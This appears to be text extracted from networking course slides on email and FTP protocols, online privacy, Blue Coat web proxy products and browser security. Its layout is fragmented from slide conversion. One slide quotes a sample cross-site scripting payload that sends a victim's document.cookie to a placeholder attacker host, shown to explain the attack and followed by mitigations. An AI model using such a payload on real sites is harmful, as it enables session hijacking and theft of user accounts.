• quit C: dele 2
C: quit
S: +OK POP3 server signing off
Telnet example 284
 283

POP3 and IMAP4

• IMAP4 provides more functionalities

• Both POP3 and IMAP4 have corresponding encrypted protocols

26.285
 284

Web-based Email
• Email clients use web browser for all interactions
• A user can access his/her email at any where, via any computer that has Internet
access
• Email provider may provide more functions
• Gmail has very good search capability
• Gmail has the message grouping function
• Many provide bundled services with their other products
• Voice/video, photo sharing, ….

26.286
 285
26-3 FILE TRANSFER

Transferring files from one computer to another is one

of the most common tasks expected from a networking
or internetworking environment. As a matter of fact, the
greatest volume of data exchange in the Internet today
is due to file transfer.

Topics discussed in this section:

File Transfer Protocol (FTP)
Anonymous FTP

26.287
 286

Note
FTP uses the services of TCP. It needs two TCP connections.

The well-known port 21 is used for the control connection and the well-known port
20 for the data connection.

26.288
 287

Figure 26.21 FTP

26.289
 288

Figure 26.22 Using the control connection

26.290
 289

Figure 26.23 Using the data connection

26.291
 Example 26.4 (continued)
290

26.292
 Example 26.5
291

We show an example of anonymous FTP. We assume that

some public data are available at internic.net.

continued on next slide

26.293
 Example 26.5 (continued)
292

26.294
 293

Dying of FTP

• People seldom use FTP nowadays

• Replaced with two ways:
• Web-based file upload/download
• Browser shows a directory content if the directory does not have a default
html file
• SSH-based file transfer

26.295
 294

Definitions: Ideals Not Realities!

 295

Privacy vs Security vs Anonymity

• Privacy (P): “I control my information”.
• Anonymity (A): “A third party cannot
associate my information with me.”
• Security (S): “My information is safe
from interference (harm)”.
• Not mutually exclusive
• Can be combined (protection in depth)
• Single point of failure: the human
 296

Hypothetical Example
• A video file (VF) resides in your computer.
• Assume the computer is always offline, is immune to
digital forensics, and can only be accessed by you.
– VF: S, P, A
• You allow others to use your computer.
– VF: !S, !P, !A
• You encrypt the file (homebrew)
– VF: S, !P, !A
• You implement user control, others cannot access the
file
– VF: S, P, !A
• You hide the file from other users
– VF: S, P, A
 297

The Problem
• Networks greatly complicate security, privacy, and
anonymity
• A known (not anonymous) file breaches privacy
and risks security
• A non-private file breaches anonymity and risks
security
• An insecure file risks privacy and anonymity
• Uploading that video file from the previous
example to a website like YouTube throws
anonymity right out the window

Network (IP) Traffic
Transport Control Protocol
(TCP)
1. Ex: HTTP, FTP, SMTP
2. Connection oriented
3. Reliability > Speed
4. Heavyweight (requires 3-
way handshake)
5. Usage: Small Data
6. Target Practice Analogy:
Stop and Pop
298
User Datagram Protocol
(UDP)
1. Ex: DNS, DHCP, VOIP
2. Connection-less
3. Speed > Reliability
4. Lightweight (no
handshake)
5. Usage: Big Data
6. Target Practice Analogy:
Spray and Pray
 299

Web Browsers and the Internet

• 1. Your web browser is a client that allows you to access the
world’s largest server, the internet.
• 2. The internet uses a service called the World Wide Web to
make it easy for clients (browsers) to view its content.
– URLS, IP addresses, search engines (web crawlers), etc.
• 3. Web browsers display information by interpreting HTML
references accessed via the internet. The HTML acts as
pointers to the information you actually want to access.
• 4. The HTML’s coding tells the browser how to interpret the
information (i.e. file format)
• 5. Browsers need to be configured with plugins to view
certain kinds of information.
• Ex: Adobe Flash, Active X, Java, JavaScript, etc.
• 6. Previous information is stored on your browser for future
easy access (cookies, history, etc. ).
 300

Private Browsing
• Unlike normal browsing, no information is stored about
you
• Private Sessions are “sandboxed” from normal sessions
• Plugins may or not be private
• Still vulnerable to:
– Search engines
– Websites that collect/share info about you (read: most
websites)
– Malware
– Internet Service Provider (ISP) surveillance
– Physical surveillance
 301

Private Browsing++
• NoScript: Control exactly what scripts (plugins)
run on your computer
• AdBlock Plus: Keep ads and adware from
executing on your computer
• Abine’s Blur: Anti-Trackers, Autogenerated Proxy
Email Addresses, Passwords, and Credit Card
Numbers,
• ShodanHQ and ScamAdvisor.com: Check where a
website is and if it is legitimate.
• CCleaner and others: Customizable local data
management
 302

Proxies vs Virtual Private

Networks
Proxies (Tor) VPN
 303

Onion Routing and VPN

Onion Routing VPN

1. $$$
1. Free! 2. Main Architecture:
Client-Server
2. Main 3. Generally All-In-One
Architecture: P2P (commercial)
4. Priority: Security and
3. Do It yourself Privacy
5. Protocol: TCP and UDP
4. Priority: Privacy
and Anonymity
 304

Mobile Anonymity
• Anonymity does not
automatically transfer to
mobile devices!
• You have to manually
configure everything
again…..
• Browsers: DuckDuckGo (or
configure others
browsers)
• Proxy: Orbot
• VPN: OpenVPN
• Root/Jailbreak for full
control!
 305
Client Proxy
Byte Caching

Logging Protocol
Authentication detection BW
management

Policy
Clients Internet

Caching
Antivirus Protocol Compression
URL-Filtering
optimization
 306
Application proxy

Streaming AOL-IM
HTTP & HTTPS Yahoo-IM
FTP
MSN-IM

Internet
MAPI

.mp3
CIFS .xxx
gral.se
?
P2P
Telnet/Shell DNS TCP-Tunnel SOCKS
 307
How We Secure the Web
Intranet Public
Web Web
Server Server

Internal
Network Public Internet

 AAA: User logs onto network

and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
 308
Authentication
NT, W2000 or RADIUS Netegrity Policy
W2003 DC Server SiteMinder Substitution

AD Directory Directory Directory

Clients
Internet

LDAP Client On box Oblix

Certifficate Database

Directory X509/CA List Directory

 309
How We Secure the Web
Intranet Public
Web Web
Server Server

Internal
Network
 Public Internet

 AAA: User logs onto network

and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
 310
How We Secure the Web
Intranet Public
Web
Server  Web
Server

Internal
Network
 Public Internet

 AAA: User logs onto network

and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy
 311

Content Filtering
• Organizations need to control what users are doing when accessing the
internet to protect from legal liability and productivity risks
• Blue Coat and our partners enable
enterprise-class content filtering
– Powerful granular user control using
Blue Coat’s Policy Processing Engine
• By user, group, destination IP and/or URL,
time of day, site, category, lots more
– Multiple logging and reporting options
– Integrates with all authentication
(LDAP, RADIUS, NTLM, AD, 2-factor, etc)
– Coaching, warnings, etc.
– High performance with integrated caching
– Drop-in appliance for easy to deploy and manage
– De-facto industry content filtering platform
 312
Content filtering databases

InterSafe Optenet IWF

WebWasher Digital Arts

Smartfilter SurfControl Proventia

Websense

Clients
Internet

Your lists BlueCoat DRTR

exceptions webfilter
 313
How We Secure the Web
Intranet Public
Web
Server  Web
Server

Internal
Network
 Public Internet

 AAA: User logs onto network

and is authenticated via NTLM,
 Bandwidth management:
Compression, Bandwidth
AD (Single-Sign-on), LDAP, management and Streaming
Radius, Forms, local password. media Caching and Splitting.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy
 314

HTTP Compression
ProxySG can support a mixed mode of HTTP compression operation
Original Content Server (OCS) or Core ProxySG can send either (de)compressed content to edge or
core ProxySG using GZIP or Deflate algorithms
Core ProxySG compressed
compressed
compressed Edge ProxySG

uncompressed uncompressed
uncompressed
Remote Office
HQ Office

compressed
compressed ProxySG

uncompressed

Enterprise uncompressed
Internet
 315

Bandwidth Management (BWM)

OBJECTIVE
Classify, control and limit the amount of bandwidth used
by a class of network traffic

BENEFITS
Protect performance of mission critical applications
• SAP, ERP apps
Prevent bandwidth greedy applications from impacting other applications
• P2P
Provision bandwidth for applications that require a per-session amount of
bandwidth
• Streaming
Balance necessary and important, bandwidth intensive, applications
• HTTP, IM
 316
How We Secure the Web
Intranet Public
Web
Server  Web
Server

Internal
Network
 Public Internet


 AAA: User logs onto network
and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy

 Bandwidth management:
Compression, Bandwidth
management and Streaming
media Caching and Splitting.
 Web Virus scanning: Potentially
harmful content entering
network via HTTP, HTTPS and
FTP
is stripped or scanned
by ProxyAV.
 317
Virus, Code & Script scanning
Other ICAP servers

Clients
Internet

Sophos McAfee
ProxyAV
Kaspersky Panda
 318

ProxyAV
ProxySG & ProxyAV
- Large Enterprise/Network Core
- Scan once, serve many (cache benefit)

Internet

• Purpose-built appliances for • Virus Scans HTTP, FTP with

caching benefit
speed • ProxySG Load Balances
• “Scan once, serve many” to ProxySG ProxyAV
increase performance
• High-availability & load- Internal
balancing Network

• Purpose built operating systems

 319
How We Secure the Web
Intranet Public
Web
Server  Web
Server

Internal
Network
  Public Internet

 

 AAA: User logs onto network

and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy
 Bandwidth management:
Compression, Bandwidth
management and Streaming
media Caching and Splitting.
 Web Virus scanning: Potentially
harmful content entering
network from web
is stripped or scanned
by ProxyAV.
 Spyware: Prevention is better
than a cure.
 320
BlueCoat Spyware Prevention Solution

• Stops spyware installations

Internet
– Detect drive-by installers
• Blocks spyware websites
– On-Proxy URL categorization
ProxySG ProxyAV
• Scans for spyware signatures
– High-performance Web AV
• Detects suspect systems Internal
Network
– Forward to cleansing agent
 321
How We Secure the Web
Intranet Public
Web
Server  Web
Server

Internal
Network
  Public Internet

  

 AAA: User logs onto network

and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy
 Bandwidth management:
Compression, Bandwidth
 IM Traffic Control: IM traffic is
subjected to policies and
management and Streaming is logged
media Caching and Splitting.
 Web Virus scanning: Potentially
harmful content entering
network from web
is stripped or scanned
by ProxyAV.
 Spyware: Prevention is better
than a cure.
 322

IM Control with Blue Coat ProxySG

• Granular IM policy control
– By enterprise, group or user level
– Control by IM feature (IM only, chat, attachments, video,
etc.), internal or external IM, time of day, etc.
– Control IM options include deny connection,
strip attachment, log chat (including attachment)
– Key word actions include send alert to IT or manager,
log, strip, send warning message to user
• Drop-in appliance for easy to deploy
and manage IM control

How We Secure the Web
Intranet
Web
Server  Web
Internal
Network
  
 
 AAA: User logs onto network
and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy
323
Public
Server

Public Internet

 Bandwidth management:
Compression, Bandwidth
 IM Traffic Control: IM traffic is
subjected to policies and
management and Streaming is logged
media Caching and Splitting.  Caching: Acceptable, clean
content is stored
 Web Virus scanning: Potentially
harmful content entering
in cache and delivered to
requestor.
network from web
is stripped or scanned
by ProxyAV.
 Spyware: Prevention is better
than a cure.
 324
Streaming acceleration

• Streaming
– Microsoft Streaming & Native RTSP
– Live Stream split, VOD Stream cache
– Rich Streaming features, Unicast-Multicast
– Scheduling live streaming from VOD

• Enhancements
– Store, Cache & distribute
Video On Demand
– Schedule VOD content to
be played as Live Content
– Convert between Multicast-Unicast
– Authenticate Streaming users
To NTLM, Ldap, RADIUS+Onbox

How We Secure the Web
Intranet
Web
Server  Web
  
 Internal
Network
 
 AAA: User logs onto network
and is authenticated via NTLM,
AD (Single-Sign-on), LDAP,
Radius, Forms, local password.
Policy Processing Engine: All
 user web application requests
are subjected to granular
security policy
Content Filtering: Requests for
 content are controlled using
content filtering based on
granular policy


 Bandwidth management:
Compression, Bandwidth
management and Streaming
media Caching and Splitting.
 Web Virus scanning: Potentially
harmful content entering
network from web
is stripped or scanned
by ProxyAV.
 Spyware: Prevention is better
than a cure.
325
Public
Server
Public Internet
 IM Traffic Control: IM traffic is
subjected to policies and
is logged
 Caching: Acceptable, clean
content is stored
in cache and delivered to
requestor.

Reporting: All browser,
streaming, IM & virus activity,
can be reported using
Bluecoat's highly configurable
reporter.
 326

Reporter
 327

The Internet
The internet today consists of 350 million webservers.

A large ammount of these conatain information you

don’t want in your organisation.

A cleaver solution would be to use Content Filtering.

BlueCoat now introduces Generation 3 of content

filtering, BlueCoat Webfilter.

350 Million
 328

Generation 1
The first generation of content filters consisted of
static manually managed lists of popular pornographic
and unproductive websites. Very often retreived from 1 Million
access logs, popular bad sites where banned.

The intended purpose was to save bandwidth and

warn users that inapropriate behaviour was logged.

People got together and distributed their lists in free

lists compatible with proxies such as Squid.

The distributed list where in the size of a million URL:s

349 Million
 329

Generation 2
Corporations relised they could make money of a list
and started to collect lists and logs from the web, manually
rating these in larger scale. More categories where added 15 Million
to increase value. The systems started to collect URL:S
autmatically and download new lists periodicly. Some
of them even many times every day.

Special categories where added for static security threats

placed on known webservers, spyware phishing etc. Other
than bad sites where added such as Economy, business,
news etc. to present statistics of Internet usage.

335 Million
 330

Generation 2
Number of URL:s was in the numbers of 10-20 millions.
Hitrates in logsystems presented was in the numbers of
50-80%. Regular expression on URL:s and other tricks 15 Million
sometimes gave a false picture of rating over 90%. But in
fact less than 5% of the Internet was covered.

335 Million
 331

Generation 3
The dynamics of internet and new security risks urged for
a new way of categorizing the Internet, Dynamic rating of
uncategorized websites can today rate most websites, the
15 Million
ones thats impossible to rate could be stripped down to
present only html and images to reduce risk.

The static URL database are constantly updated like any

Generation 2 filter. This database is cached in some
systems (ProxySG) to increase performance.
The rest (95%) of the Internet is categorised using
dynamic rating.

335 Million
 332

Dynamic Real Time Rating

Servers
Internet

RS
language 1
G2

To background rating
Language detection
language 2
language 3
language 4
44µs language 5
language n
DBR
HR
DRTR

Clients

Customer DXD BlueCoat

* The picture is simplified, all systems are redundant.
 333

SSL Proxy
 334

SSL Proxy: Policy Enforcement

• Control web content, applications, and services…regardless of encryption
– Block, allow, throttle, scan, accelerate, insert, strip, redirect, transform …
– Apply the same policies to encrypted traffic as to normal traffic
– Stops/controls rogue applications that take advantage of SSL
• Protect the enterprise from SSL-borne threats
– Stop spyware and secured phishing
– SSL-secured webmail and extranets – virus transmissions
– SSL-borne malicious and inappropriate content
• Accelerate critical applications
– Enables a variety of acceleration techniques (e.g., caching)

Apps
SSL Policy SSL
User

Internet Internal
Network
 335
Blue Coat: Visibility and Context
Client-Proxy Connection Server-Proxy Connection
Client Proxy Server

Algorithms I support. Algorithms I support.

Connection Request. Connection Request. Use this algorithm.
Server’s digital
Let’s use certificate.
Verify certificate Verify certificate
and extract (proxy’s) this algorithm. and extract server’s
public key. Emulated certificate. public key.

Complete Complete Complete Complete

Authentication. Authentication. Authentication. Authentication.

Tunnel Established Tunnel Established

 336

Flexible Configurations
• Trusted applications passed through
– Sensitive, known, financial or health
care Option 1

• No cache, visibility
• Awareness of network-level
Apps
information only Control

User
SSL
Internet
TCP TCP
 337

Flexible Configurations
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic passed through
after initial checks Option 2
• No cache
• Visibility and context of network-level info, certificates,
user, and applications
• Can warn user, remind of AUP, and
offer opt-out
Control
Apps

User
SSL
Internet
TCP TCP
 338

Flexible Configurations
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic proxied after initial checks
• Full caching and logging options Option 3
• Visibility and context of network-level info,
certificates, user, applications, content, etc.
– Full termination/proxy
• Can warn user, remind of AUP, and
offer opt-out
Control
Apps
User
SSL SSL
Internet TCP TCP
 339

Reverse Proxy
 340
Reverse Proxy

Policy
Logging
Authentication URL-rewrite

Internet
Clients

Servers

AV SSL/Certificate
Caching
 341

Reverse Proxy
PROTECTS Web Servers ACCELERATES Web Content
• Secure, object-based OS • Intelligent caching
• Controls access to web apps • Compression and bandwidth mgt.
• Web AV scanning • TCP & SSL offload

Web
Servers
ProxySG
Users
Firewall
Internal Public
Network Internet
Users
SIMPLIFIES Operations
• Scalable, optimized appliance
• Easy policy creation & management
• Complete logging & reporting

Secure & Accelerate Web Applications

 342

HTTPS Termination
• HTTPS Termination (Client  ProxySG)
– Off-load secure website or portal
• HTTPS Origination (ProxySG  Server)
– Secure channel to content server for clients
• Man-in-the-Middle (Termination & Origination)
– Allows caching, policy and virus scanning
• Secure credential acquisitions
• SSL Hardware Acceleration Cards
– 800 RSA transactions per second per card
– SSL v2.0, v3.0, and TLS v1 support
• Off-load web application servers to improve performance
 343
Example Scenarios for Reverse Proxy
• Secure and Accelerate Public Websites
– Improves content delivery with integrated caching
– Services legitimate users while resisting DoS attacks
– High-performance SSL
• Secure Corporate Webmail
– Securely isolates Web servers from direct Internet access
– Proxy authentication for additional layer of protection
– Plug-n-play SSL
• Scanning Uploaded Files for Viruses
– Simple integration with ProxyAV™
– Real-time scanning of uploaded content
– Protects Web infrastructure from malware
 344
Recipe for Branch
Performance Problems
Server Consolidation
+ Increased application traffic

+ Inefficient application protocols

+ Highly distributed users

+ Narrow bandwidth links

= Poor Application Performance

 345
Minimum for Application Acceleration

 Optimize use of existing WAN bandwidth

 Reduce latency associated with applications
 Improve the efficiency of application
protocols
 Prioritize the applications that matter most
 Re-use and compress data where possible
 Accelerate File Sharing, Email, and browser-
based enterprise applications
Complete Solution Requires More
 346
Platform for Application Acceleration

Multiprotocol Accelerated Caching Hierarchy

Bandwidth Protocol Object Byte

Compression
Management Optimization Caching Caching

File Services (CIFS), Web (HTTP), Exchange (MAPI),

Video/Streaming (RTSP, MMS), Secure Web (SSL)
 347
New Requirement: SSL Acceleration

More and More SSL… • Nearly 50% of all corporate

Web application traffic is
SSL
• 70% of all mobile and
teleworkers use SSL for
SSL Traffic

secure application delivery

• 68% of Blue Coat customers
depend on externally
hosted Web applications
Internally Externally
Hosted Apps Hosted Apps

Source: Blue Coat Customer Surveys

 348
New Requirement: Video Acceleration

• Enterprise users
becoming more distributed
– Mobile, teleworker, and branch/
remote offices
– Regulatory and cost drivers
• Remote employee training
becoming a necessity
– Live (streaming) and on-demand video
• Performance quality
becoming a requirement
– Network and application issues must be
addressed
– Control and acceleration of video
is needed
 349

Bandwidth Management
Sales Automation App E-Mail
Priority 1 Priority 2
Min 400Kb, Max 800Kb Min 100Kb, Max 400Kb

File Services General Web Surfing

Priority 3 Priority 4
Min 400Kb, Max 800Kb Min 0Kb, Max 200Kb

• Divide user and application traffic into classes

• Guarantee min and/or max bandwidth for a class
• Align traffic classes to business priorities
 350

Protocol Optimization
 351

Protocol Optimization

10-100X Faster
Includes CIFS, MAPI, HTTP, HTTPS, TCP
 352

Object Caching
• Built on high-level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Advantages
– Fastest response times
– Offload work from servers (and networks)
– Can be deployed asymmetrically
• Limitations
– Application-specific
– All or nothing: No benefit if whole object not found or changed

Byte Caching
Local History Cache
…..11011111001110011...11100111100110
01010111011001000011010011001110010
They are
00001111000111001100011000001001111
00000011011110100100001101100010111 Proxies keep a
transmitted as
11001010101011100110100111010011110 history of all
small references
01000000000000111001011100101101101
10100101011001011001111000111111111 bytes sent and
1000000000
over the WAN
received
1101111100111001001001011100110
0101011101100100001101001100111
0010000011110001110011000110000 [R1]0010010[R2]100101111100
0100111100000011011110100100001 110100111011010011[R3]
1011010010111110011010011101101
0011010011110010000000000001110
0101110010110110110100101011001
01100
Local LAN WAN Link
353
Remote History Cache
…..11011111001110011...11100111100110
Sequences are 01010111011001000011010011001110010
The original 00001111000111001100011000001001111
found in the local
00000011011110100100001101100010111
stream
history is
cache 11001010101011100110100111010011110
reconstructed01000000000000111001011100101101101
10100101011001011001111000111111111
using the remote
history cache
1000000000
1101111100111001001001011100110
0101011101100100001101001100111
0010000011110001110011000110000
0100111100000011011110100100001
1011010010111110011010011101101
0011010011110010000000000001110
0101110010110110110100101011001
01100
Remote LAN
 354

Compression

110111110011100100100 110111110011100100100
101110011001010111011 101110011001010111011
001000011010011001110 001000011010011001110
010000011110001110011 010000011110001110011
000110000010011110000 COMPRESSION 000110000010011110000
001101111010010000110 1101111100111001001001011100110010101110110010000 001101111010010000110
110100101111100110100 10011001110010000011110001110011000110000010011 110100101111100110100
111011010011010011110 111011010011010011110
010000000000001110010 010000000000001110010
111001011011011010010 111001011011011010010
101100101100010100100 101100101100010100100
101010101010100010111 101010101010100010111

• Industry-standard gzip algorithm compresses all traffic

• Removes predictable “white space” from content and objects
being transmitted
 355

MACH5 Techniques Work Together

Object Caching
•Caches repeated, static app-level data; reduces BW and latency
Byte Caching
• Caches any TCP application using
similar/changed data; reduces BW
Compression
• Reduces amount of data transmitted; saves BW
Bandwidth Management
• Prioritize, limit, allocate, assign DiffServ – by user or
application
Protocol Optimization
• Remove inefficiencies, reduce latency
 356

Object Caching
• Object caches are built on higher level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Object cache advantages
– Fastest response times
– Offload work from servers
– Can be deployed asymmetrically
• Object cache disadvantages
– Works with limited set of applications
– Works on limited range of data inside applications
– All or nothing: No benefit if whole object not found or changed
 357
Object vs. Byte Caching

Object Caching Byte Cache

HTTP(S), FTP,
Proxy? Streaming, CIFS Built on TCP

Protocol Optimization Integration X

Server Offload X

Network Offload X X

Incremental Updates X

No App Integration X

End User Performance Best Good

Scope Focused Broad

 358

Products
 359
MACH Ships with Blue Coat SGOS 5
5

SG8000 Series
Headquarters
Corporate

SG800 Series

SG400 Series

SG200 Series • GA April 2006

Remote
Offices

• Appliances start at US$1,995

Branch Office Enterprise Core

 360
ProxyAV Appliances

Corporate
Headquarters
2000-E Series

400-E Series

Remote
Offices

Connected
Users Up to 250 users 100-2000 users 1000 -50,000+ users

Sub 1.5Mbps 1.5Mbps- 45Mbps 150Mbps +

WAN Bandwidth
Bandwidth Bandwidth Bandwidth

Performance
 361

400-E1
• One Model: 400-E1
• RAM: 512 MB
• CPU: 1.26GHz PIII
• Disk drive 40 GB IDE
• Network Interfaces (2 on board) 10/100
Base-T Ethernet
• 19" Rack-mountable
 362
Software

 Reporter (SW)
 Advanced Java application to generate statistics from logs
 363
Licenced products

 Licensed products
 Streaming
 Real Networks, Microsoft, Quicktime
 Instant Messaging
 MSN, Yahoo, AOL
 Optional Security (HW+SW bundle)
 SSL termination/proxy
 364

Licenced products
 Licensed products
 Content filtering
 BlueCoat Webfilter
 ICAP AV Scanner
 ProxyAV (McAfee, Sophos, Panda, Kaspersky, Ahn Labs)
 365

The Power of the Proxy

Web Security
• Prevent spyware,
malware & viruses
• Stop DoS attacks
+ deny, transform, etc)
• IE vulnerabilities,
IM threats
Policy Control Accelerated Applications
• Fine-grained policy for applications, • Multiprotocol
protocols, content & users (allow, Accelerated Caching Hierarchy
• Granular, flexible logging
+ • BW mgmt, compression,
protocol optimization
• Authentication integration • Byte & object caching

Full Protocol Termination = Total Visibility & Context

(HTTP, SSL, IM, Streaming, P2P, SOCKS, FTP, CIFS, MAPI, Telnet, DNS)

Ultimate Control Point for Communications

 366

Management
 367
Management

• User Interface
– HTTP (HTTPS), web GUI Interface
– Telnet (Cisco CLI)
– SSH & Serial console
– Java Policy interface
– CPL, Policy Language
– SNMP MIBII + Traps
– Monitor network status and statistics
• Reporting tools
– BlueCoat Reporter
• Scalable management
– Centralized configuration management in Director
 368
Reporting (example)

18.2 % Spyware (gator)

16.5 % Aftonbladet
9.5 % Ad’s (in top 40)
6.8 % https (encrypted)
369
370
371
372
 373
System-wide Management and Control

• Blue Coat Director

– Centralized configuration of Blue Coat
appliances – set up, policy, etc
– Centralized monitoring – appliance health,
application use, user experience
• Blue Coat Reporter
– Enterprise roll-up and analysis of application
delivery information: appliances,
application use, user experience
Both Director and Reporter are proven, with thousands of
nodes under management…
 374

Director configuration Management

Remotely and Work-
securely manage station
via GUI or CLI.
• Configuration Management
• Policy Management
Director • Disaster protection centrally
(2) Snapshot profile and Configuration Management
save on Director • Monitor and control
(3) Create and edit overlays • Resource Management
using GUI or CLI.
“Profile” system • Monitor network
status and statistics
• Profile Management
(4) Push profiles and • Backup configuration
(1) Configure and test “profile” overlays to one
or more systems • Create overlays using GUI
system or CLI. Automate changes
• License Management

Production systems
 375
Content Delivery Network

1 Publish
content WWW Pull content
4
Servers from origin
servers.
Content
Owners
Edge
Systems
Director
2 Tell Director
about new 5 Deliver the
content
3 Tell caches to content.
update content

Users
 376

GUI
 377

History
• First ever browser – WorldWideWeb
(1990)
o Created at CERN by Tim Berners-Lee
o Used internally, no real security threats
o Would only display HTML text
o Allowed downloading of other file types
 378

History
• Mosaic (1993)
o First browser with a GUI
o Lead to increase in Internet popularity
• Netscape Navigator (1994)
o Nearly disappeared by 2000
• Internet Explorer (1995)
o Held as much as 95% of the market
 379

History
• Safari (2003)
o Apple’s browser
• Firefox (2004)
o Open source
• Chrome (2008)
o Rapid increase in market share
 380

Security Issues

• Increase in security issues

o Complexity of web sites and browsers
o Size of the Internet
o Anyone can access
• Uses of Internet
o Online banking
o Shopping
o More sharing of sensitive data
 381

Security Issues
Cross Site Scripting (XSS)
o Takes advantage of complex, dynamic web pages
o Injects client side scripts, HTML
o Can lead to cookie theft, browser redirection, untrusted content
o Nearly 80% of vulnerabilities in 2007 (Symantec)
 382

Security Issues
Example
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie</script>
source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting

• XSS Mitigation
 Disable scripting
 Sanitize input, escape HTML/scripts
 No script access to cookies
 383

Security Issues

• Local Storage
o Form data
o Login credentials

• Encryption - HTTP vs HTTPS

o Packet sniffing -> session hijacking, password stealing
 384

Protecting Yourself Online

• Incognito Mode (Google Chrome)
 Allows user to switch between multiple privacy settings with the
click of a button
 Can be activated in one window/tab but not others

• Browser Guards
o Modern browsers will prevent users from visiting malicious sites
o Two main methods
 List of reported malicious sites
 Algorithm to detect malicious code on a site
o This can protect from viruses, phishing, and other threats
 385
What is Internet

 Inter connection of many computers via network.

 Global connected through network (through LAN or WAN)

 To provide the various application services i.e. E-Mail, Usenet (News),

WWW, Telnet, FTP, etc

 At any time millions user connected to the internet from many countries.
 386
Uses of Internet
 Searching
 E-mail service
 Commercial Services
 Electronic books & Publication
 Video Conferencing
 Sharing data and results quickly
 Retrieving files & Program of all types
 Find information databases and tutorials
 News paper columns
 Banking
 Downloading / Uploading any information
 News, sports, stocks, music etc.
 Use of internet in various fields like education, Business, governance, etc.
 And many more ………………..
 387
Useful Keys Internet
• Network: Connecting computers with each other For exchanging
information

• Client : It is a programme or computer for getting special

information from another compute.

• Server: It is a programme or computer, which gives information

to the client computer.

• Protocol: It’s a rules for connecting to the internet. (TCP/IP)

• Portal: It is a website. Known as a gateway of internet.

(Search engine)

19/08/2021 389
 388

Router: It is a device, which decides where data will be send

(Network point)

www : World Wide Web

Browser: It is a programme which helps us to use internet

Website: Group of different web pages.

URL : Universal Resource Locator

 389
Types of Website (Domain No.)

.com : Commercial organization

.net : Large Networks
.gov : Government organization
.org : non-profit making organization
.edu : educational organization
.mil : military organization
.in : India
.au : Australia
.us : United States
.uk : United Kingdom
 390

• Exercises
 391

Thank you